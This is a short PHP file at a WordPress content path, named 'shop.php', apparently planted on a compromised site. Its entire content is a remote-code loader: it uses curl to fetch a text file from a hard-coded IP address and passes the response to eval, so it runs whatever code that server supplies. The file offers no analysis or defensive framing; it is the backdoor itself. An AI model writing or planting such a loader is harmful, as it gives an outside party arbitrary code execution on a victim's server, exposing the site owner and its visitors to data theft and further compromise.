/home/sylamedg/www/wp-content/shop.php
<?php
$c = curl_init("http://192.187.118.26/z51030_16/stat/index2.txt");
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 5);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
$result = curl_exec($c);
if ($result !== false) {
    eval('?>' . $result);
}
curl_close($c);